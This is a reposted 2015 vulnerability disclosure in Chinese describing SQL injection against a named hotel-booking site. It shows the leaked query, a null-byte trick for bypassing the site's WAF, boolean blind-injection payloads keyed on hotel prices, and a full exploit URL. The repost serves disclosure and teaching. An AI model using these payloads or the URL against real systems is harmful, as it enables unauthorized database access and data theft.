记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

住哪儿某站前台绕过WAF注入(论注入语句的构造)

2015-05-28 01:35

站点:http://m.zhuna.cn

在酒店预定的酒店名称处存在注入

1.png



2.png





得到如下信息:

Filename: /var/wwwroot/testwap/wap/models/index_model.php

select * from (select ID,HotelName,cityname,eareaname,address,XingJi,Min_Jiage,Max_Jiage,df_haoping,x,y,CBD,dbo.baidu_juli(39.998688179804,116.34375398973,baidu_lat,baidu_lng) as juli, px_dingdan ,dbo.compare(1,1,day10) as day10_isfull ,ROW_NUMBER() OVER ( ORDER BY dbo.compare(1,1,day10) desc, dbo.baidu_juli(39.998688179804,116.34375398973,baidu_lat,baidu_lng), px_dingdan DESC, id DESC ) as rowslist from hotelinfo where ecityid = 0101 and shenhe = 1 AND (lat between 39.948688179804 and 40.048688179804) and (lng between 116.29375398973 and 116.39375398973 ) AND Min_Jiage >= 0 and hotelname like '%'%' and x is not null and y is not null ) as a where a.rowslist > 0 and a.rowslist <= 10

接下来就是构造注入语句:

构造注入语句如下:

%' and 1=1 and '%'='

提示存在危险字符:

3.png





修改注入语句绕过:

%' an%00d 1=1 an%00d '%'='

接下来发现1=1,1=2,‘A’='A'等都不能作为判定条件<查询返回相同,都是查不到结果,很奇怪>,然后尝试构造时间延迟,报错注入等,要么提示语法错误,要么提示不是built-in function,

4.png



5.png





现在的问题是找到一个判断条件,来对输出的结果进行判定,这个判断条件来自哪里呢?

这时候看到有一个酒店价格,选中搜索一下,

6.png





SQL语句中多了一句:

AND Min_Jiage <= 150

价格大于150的,是数字,那么可以找到一个价格,返回唯一的值,即可作为判断条件,这里将酒店价格选择不限,然后在注入语句中插入该查询条件,

找到一个合适的价格,只返回唯一的值

AND Min_Jiage = 600

7.png



8.png





继续构造:

%' an%00d Min_Jiage = (ascii(substring(db_name(),1,1))+496) an%00d '%'='

http://m.zhuna.cn/wap/index.php/index/hotelSearch?city=bj&tm1=2015-04-12&day=1&position=%E4%BA%94%E9%81%93%E5%8F%A3&keyword=%25%27+an%2500d+Min_Jiage+%3D+%28ascii%28substring%28db_name%28%29%2C1%2C1%29%29%2B496%29+an%2500d+%27%25%27%3D%27&price=

9.png



10.png



漏洞证明:

说明db_name()的第一位为h,至此,有了判定条件,最后得到数据库名为:db_name()=hotel_9tour_cn

修复方案:


知识来源: www.wooyun.org/bugs/wooyun-2015-0107520

阅读:130762 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“住哪儿某站前台绕过WAF注入(论注入语句的构造)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云